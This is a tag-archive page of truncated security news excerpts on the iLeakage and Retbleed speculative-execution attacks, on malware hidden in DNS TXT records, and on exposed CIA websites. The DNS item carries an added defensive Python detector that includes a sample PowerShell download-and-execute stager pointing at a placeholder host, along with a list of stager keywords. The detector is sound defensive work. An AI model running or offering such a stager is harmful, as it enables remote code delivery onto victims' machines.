Tag Archive for: Execution

New speculative execution hack can expose passwords and other sensitive data on Apple SoCs


TL;DR: Researchers at Georgia Tech have developed a side-channel exploit for Apple M-series and A-series chips running macOS and iOS. The attack, cleverly dubbed iLeakage, can force Safari and other browsers to reveal Gmail messages, passwords, and other sensitive and private information.

iLeakage works similarly to the Spectre and Meltdown exploits that gave chip manufacturers so much trouble in 2018. The attack leverages the speculative execution feature of modern processors to gain access to information that would normally be hidden.

The method Georgia Tech developed is not a simple matter. While it doesn’t require specialized equipment, the attacker must have a decent knowledge of reverse engineering Apple hardware and side-channel exploits. It also involves creating a malicious website that uses JavaScript to covertly open another webpage, Gmail, for example, to scrape data into a separate popup window on the hacker’s computer. It’s not a hack that script kiddies could execute.

https://www.youtube.com/watch?v=Z2RtpN77H8o

The technique can reveal the contents of an email so long as the user is logged into Gmail (masthead video). It can also grab credentials if the victim uses a password manager’s auto-fill function (above). Theoretically, the exploit could show the hacker practically anything that goes through the processor’s speculative execution pipe. Below they demo how it can access a target’s YouTube history.

iLeakage utilizes WebKit, so it only works with Safari on Macs with an M-series chip (2020 or later). However, any browser on recent iPhones or iPads is vulnerable since Apple requires developers to use its browser engine on those operating systems. It is unclear if the method could be tweaked to use non-WebKit browsers in macOS.

Although there is no CVE tracking designator, Georgia Tech notified Apple of the security issue on September 12, 2022. Cupertino developers are still working on fully mitigating it. At the time of public disclosure, Apple had patched the vulnerability in macOS, but it’s not on by default and is considered “unstable.” The researchers listed steps to enable the…

Source…

Harnessing DNS TXT Records for Malware Execution


Threat actors continue to formulate clever methods to infiltrate systems and compromise digital security. One such sophisticated technique involves the exploitation of DNS TXT (Text) records, a seemingly innocuous component of the Domain Name System (DNS). This blog post explores the mechanics of how threat actors utilize DNS TXT records to contain PowerShell commands and execute malware, shedding light on the technical intricacies and the implications for cybersecurity.

An Overview of DNS TXT Records

To understand this threat, it’s important to comprehend the basics of DNS TXT records. These records are a part of the DNS system, which acts as the Internet’s address book, translating human-readable domain names into the IP addresses that computers actually use. TXT records were originally intended for adding arbitrary text notes to a domain’s DNS settings. Over time, however, their versatility has been exploited by threat actors for malicious purposes.

PowerShell is a powerful scripting language built into Windows operating systems. It is legitimate and widely used for system administration tasks. Unfortunately, it has also become a favorite tool for threat actors due to its capabilities for executing complex commands and scripting.

Threat actors have turned DNS TXT records into a covert communication channel and malware delivery mechanism. Here is a simplified breakdown of the steps they take:

1. Crafting the Attack: The threat actor prepares a PowerShell command that serves as a malicious payload. This command could involve downloading additional files, running scripts, or even establishing a connection to a command and control server.

2. Encoding the Command: To obscure the malicious nature of the payload, threat actors encode the PowerShell command using various techniques like Base64 encoding. This encoding makes it more difficult for security solutions to detect the malicious content.

3. Storing the Command in DNS TXT Records: The encoded PowerShell command is inserted into the DNS TXT record associated with a domain controlled by the attacker. This can be a seemingly benign or compromised domain.

4. Triggering the Attack: The infected machine makes a DNS…
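As an added example (not code from the original post), here is a defender-side check for the technique described above: it takes DNS TXT answers, for instance pulled from a resolver's query log, decodes any value that is a pure base64 blob, and looks for PowerShell tokens in the result. The sample records, the stager string and the domain names are all constructed placeholders; the DKIM and verification-token records are included because they are also base64 and must not be flagged.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Tokens typical of PowerShell download-and-execute stagers (case-insensitive).
PS_TOKENS = re.compile(
    r"(?i)\b(?:Invoke-Expression|IEX|DownloadString|DownloadFile|New-Object|"
    r"Net\.WebClient|Invoke-WebRequest|EncodedCommand|FromBase64String)\b")
# A TXT value that is one long run of base64 alphabet characters.
B64_ONLY = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

def decodings(txt: str) -> List[str]:
    """Decode a base64-only TXT value as UTF-16LE (what PowerShell's
    -EncodedCommand uses) and as UTF-8; return every decoding that succeeds."""
    compact = txt.replace(" ", "").replace('"', "")
    if not B64_ONLY.match(compact):
        return []
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return []
    out = []
    for enc in ("utf-16-le", "utf-8"):
        try:
            out.append(raw.decode(enc))
        except UnicodeDecodeError:
            pass
    return out

def classify_txt(txt: str) -> Tuple[str, Optional[str]]:
    """Label a TXT value 'plain-powershell', 'encoded-powershell' (with the
    decoded command) or 'benign'. Base64 alone is not a signal: DKIM keys and
    verification tokens are base64 too, so decode and look for PowerShell tokens."""
    if PS_TOKENS.search(txt):
        return "plain-powershell", txt
    for text in decodings(txt):
        if PS_TOKENS.search(text):
            return "encoded-powershell", text
    return "benign", None

# Constructed sample answers (no real domains); the stager is encoded here so
# the base64 is exact, and it points at the reserved .invalid TLD.
STAGER = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"
SAMPLE_RECORDS = {
    "example.com": "v=spf1 include:_spf.example.com -all",
    "selector1._domainkey.example.com": "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC",
    "_verify.example.com": base64.b64encode(b"site-verification-token-9f3a").decode(),
    "update.example.invalid": base64.b64encode(STAGER.encode("utf-16-le")).decode(),
}
```

Running `classify_txt` over each value in `SAMPLE_RECORDS` labels only the last record as encoded PowerShell; in practice the same check belongs on TXT answers that are unusually long or requested by processes other than mail or DNS tooling.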

Source…

CIA’s ‘weak’ websites led to capture execution of assets in Iran, China: Report


A flaw in the ‘covert’ websites of the Central Intelligence Agency compromised the US spy agency’s assets in countries like Iran and China, according to a report by security researchers. The researchers claimed that the internet security flaw led to the deaths of more than two dozen US assets in China in 2011 and 2012, while other assets in Iran were either executed or imprisoned by the regime. The research carried out by security experts at the University of Toronto’s Citizen Lab also said that the flaw could have been detected by an amateur sleuth, British website The Guardian reported. The security experts began their probe following a tip from a Reuters journalist.

Joel Schectmann, the Reuters journalist, had reportedly tipped the research group about a CIA asset in Iran who had been captured and later served seven years in prison after using the ‘fatally insecure network’. In 2018, two Yahoo News reporters first reported that a system used by the agency to communicate with its assets had been compromised by Iran and China.

However, the researchers said they were not publishing the full report, so as to avoid putting more CIA assets at risk. But the revelations have brought the agency’s handling of digital safety measures under scrutiny. According to the report, at least 885 websites were identified as having been used by the CIA. They were purportedly websites concerned with news, healthcare, weather, etc.

The research group said an amateur sleuth could have mapped the entire CIA network and attributed it to the US administration. According to the report, these websites were active between 2004 and 2013. They were not used by the agency recently, but a subset of these websites were still linked to active employees or assets.

Calling out the ‘reckless construction’ of the CIA’s infrastructure, Citizen Lab claimed that the loophole led to the identification and execution of the agency’s assets, while risking the lives of countless other individuals linked to it.

A spokesperson for the CIA said the agency takes its obligations to protect the people who work with it extremely…

Source…

Researchers Devise New Speculative Execution Attacks Against Some Intel, AMD CPUs


Researchers at ETH Zurich have found a way to overcome a commonly used defense mechanism against so-called speculative execution attacks targeting modern microprocessors.

In a technical paper published this week, the researchers described how attackers could use their technique — dubbed “Retbleed” — to steal sensitive data from the memory of systems with Intel and AMD microprocessors that are vulnerable to the issue. The researchers built their proof-of-concept code for Linux but said some Windows and Apple computers with the affected microprocessors likely have the issue as well.

Their discovery prompted Intel and AMD to issue advisories this week describing mitigations against the new attack method. In an emailed statement, Intel said it had worked with industry partners, the Linux community, and Virtual Machine Manager (VMM) vendors to make mitigations available to customers. “Windows systems are not affected as they already have these mitigations by default,” Intel noted.

AMD said the issue the researchers had identified potentially allows arbitrary speculative code execution under certain microarchitecture conditions. “As part of its ongoing work to identify and respond to new potential security vulnerabilities, AMD is recommending software suppliers consider taking additional steps to help guard against Spectre-like attacks,” AMD said in an emailed statement. “That guidance is found in a new AMD whitepaper now available.”

Both chipmakers said they were not aware of any active exploits in the wild related to the issue that the researchers at ETH Zurich discovered and reported.

A Dangerous Attack Vector

Security researchers consider speculative execution attacks as dangerous because they give attackers a way to access and steal sensitive data — including passwords and encryption keys — in a computer’s memory. It’s an issue that is especially of concern in shared environments such as public cloud services and shared enterprise infrastructure.

Speculative execution is a performance-enhancing mechanism in modern microprocessors where instructions in code are executed in advance of when they are needed, without waiting for previous instructions to be completed. The…

Source…